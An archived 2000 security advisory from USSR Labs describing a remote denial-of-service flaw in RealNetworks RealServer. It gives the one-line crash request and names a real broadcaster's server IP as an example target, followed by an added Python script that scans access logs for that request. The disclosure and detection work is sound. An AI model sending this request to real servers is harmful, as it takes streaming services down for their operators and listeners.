Date: Tue, 1 Aug 2000 07:58:06 -0300
Reply-To: "Discussion regarding Windows-related security vulnerabilities and risks."
From: Ussr Labs
Subject: Remote DoS attack in Real Networks Real Server (Strike #2) Vulnerability
Comments: cc: nTBUGTRAQ
To: win2ksecadvice@LISTSERV.NTSECURITY.NET

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Remote DoS attack in Real Networks Real Server (Strike #2) Vulnerability

USSR Advisory Code: USSR-2000043

Release Date:
June 1, 2000

Systems Affected:
Real Networks Real Server 7 Linuxc6
Real Networks Real Server 7 Solaris 2.6
Real Networks Real Server 7 Solaris 2.7
Real Networks Real Server 7 Solaris 2.8
Real Networks Real Server 7 Windows NT/2000
Real Networks Real Server 7 SGI Irix 6.2
Real Networks Real Server 7 SGI Irix 6.5
Real Networks Real Server 7 SCO Unixware 7.xx
Real Networks Real Server 7 FreeBSD 3.0
Real Networks Real Server 7.01 Linuxc6
Real Networks Real Server 7.01 Solaris 2.6
Real Networks Real Server 7.01 Solaris 2.7
Real Networks Real Server 7.01 Solaris 2.8
Real Networks Real Server 7.01 Windows NT/2000
Real Networks Real Server 7.01 SGI Irix 6.2
Real Networks Real Server 7.01 SGI Irix 6.5
Real Networks Real Server 7.01 SCO Unixware 7.xx
Real Networks Real Server 7.01 FreeBSD 3.0
Real Networks Real Server G2 1.0

THE PROBLEM

The Ussr Labs team has recently discovered a memory problem in the
RealServer 7 Server (patched and non-patched). When specially malformed
information is sent to the RealServer HTTP port (default is 8080), the
process containing the services stops responding.

The Exploit:
It will take down the RealServer, causing it to stop all streaming
media broadcasts and making it non-functional (until reboot).

Example:

With the RealServer server running on 'Port' (default being 8080), the
syntax to do the D.O.S. attack is:

http://ServerIp:Port/viewsource/template.html?

And Real Server will stop responding.

SPECIAL NOTE: We take no responsibility for this example; it is for
educational purposes only. Don't test against British Broadcasting
Corporation 1999 Radio.

Example 2:

Radio: British Broadcasting Corporation 1999 (default in RealPlayer 8)
Radio Url:
http://playlist.broadcast.com/makeplaylist.asp?id=7708&encad=2F6164732F617564696F686967687761792F617564696F68696768776179325F3238

RealServer http running on port 80
RealServer http ip: 206.190.42.7

Valid Url for Clip Source:
http://206.190.42.7/viewsource/template.html?nuyhtgs0pdz6iqm557a6i9bgj054ngdnbfzgro7zxfAjq357lnwEC6ne8s5ge5hi4ejqC1t6x1amngaAmkyf59v6zgjqC1t6x1amngoAmkyf1AvuEfhe640hBh60EeADAo2097qglh

Malformed Url for Clip Source:
http://206.190.42.7/viewsource/template.html?

Vendor Status:
Yes! Informed! I sent them more than 4 emails and each time I received
JUNK mails in reply; my Incident ID number for this request is
19163930.

Vendor Url: http://www.real.com
Program Url: http://www.realnetworks.com/products/basicserverplus/index.html?src=home
Download Url: http://proforma.real.com/rn/servers/eval/index.html?src=home,srvpl_020400,srvntra

Related Links:

Underground Security Systems Research
http://www.ussrback.com

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN,
Sub, prizm, b0f, Technotronic and Rfp.

Copyright (c) 1999-2000 Underground Security Systems Research.
Permission is hereby granted for the redistribution of this alert
electronically.
It is not to be edited in any way without express consent of Ussr. If
you wish to reprint the whole or any part of this alert in any other
medium excluding electronic medium, please e-mail labs@ussrback.com
for permission.

Disclaimer:
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.

Feedback:
Please send suggestions, updates, and comments to:

Underground Security Systems Research
mail:labs@ussrback.com
http://www.ussrback.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use

iQA/AwUBOYasW63JcbWNj6DDEQLZxgCgjWeLKvWMrBK31yLVcVFyE5c0L3kAoN7S
oWEgPTUN+phP6uJGmJxy056c
=yK6F
-----END PGP SIGNATURE-----
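
For operators checking whether their server received the request form described under "The Exploit", here is a log check added as an example; it is not part of the advisory and not vendor code. It assumes the HTTP access log is in Common Log Format, uses constructed sample lines with documentation addresses, and goes slightly beyond the advisory by also flagging requests to the same path that carry no "?" at all.

```python
import re
from urllib.parse import unquote

# Assumption: Common Log Format; fields are client, ident, user, [time], "request", status.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)(?: \S+)?" (\d{3}|-)')
VIEWSOURCE_PATH = "/viewsource/template.html"   # path named in the advisory
ABSOLUTE_PREFIX = re.compile(r"^[a-z][a-z0-9+.-]*://[^/?#]*", re.I)

def is_malformed_viewsource(target: str) -> bool:
    """True if target is the view-source template with an empty or absent query."""
    target = ABSOLUTE_PREFIX.sub("", target)        # accept absolute-form targets
    path, _, query = target.partition("?")
    query = query.split("#", 1)[0]
    # Normalise percent-encoding, repeated slashes and case before comparing.
    path = re.sub(r"/{2,}", "/", unquote(path)).lower()
    return path == VIEWSOURCE_PATH and unquote(query).strip() == ""

def scan(lines):
    """Return (line number, client, request target, status) for each flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = REQUEST_RE.match(line)
        if m and is_malformed_viewsource(m.group(3)):
            hits.append((number, m.group(1), m.group(3), m.group(4)))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Aug/2000:07:58:01 -0300] '
    '"GET /viewsource/template.html?constructedtoken123 HTTP/1.0" 200 5120',
    '203.0.113.9 - - [01/Aug/2000:07:58:06 -0300] '
    '"GET /viewsource/template.html? HTTP/1.0" - 0',
    '203.0.113.9 - - [01/Aug/2000:07:58:09 -0300] '
    '"GET http://192.0.2.10:8080/viewsource/template%2Ehtml? HTTP/1.0" 200 0',
    '198.51.100.7 - - [01/Aug/2000:07:58:12 -0300] '
    '"GET /ramgen/clip.rm HTTP/1.0" 200 312',
    '203.0.113.9 - - [01/Aug/2000:07:58:15 -0300] '
    '"GET /ViewSource//template.html HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for number, client, target, status in scan(SAMPLE_LOG):
        print(f"line {number}: {client} requested {target!r} (status {status})")
```

The same predicate can back a reverse-proxy rule that rejects the request before it reaches the RealServer HTTP port.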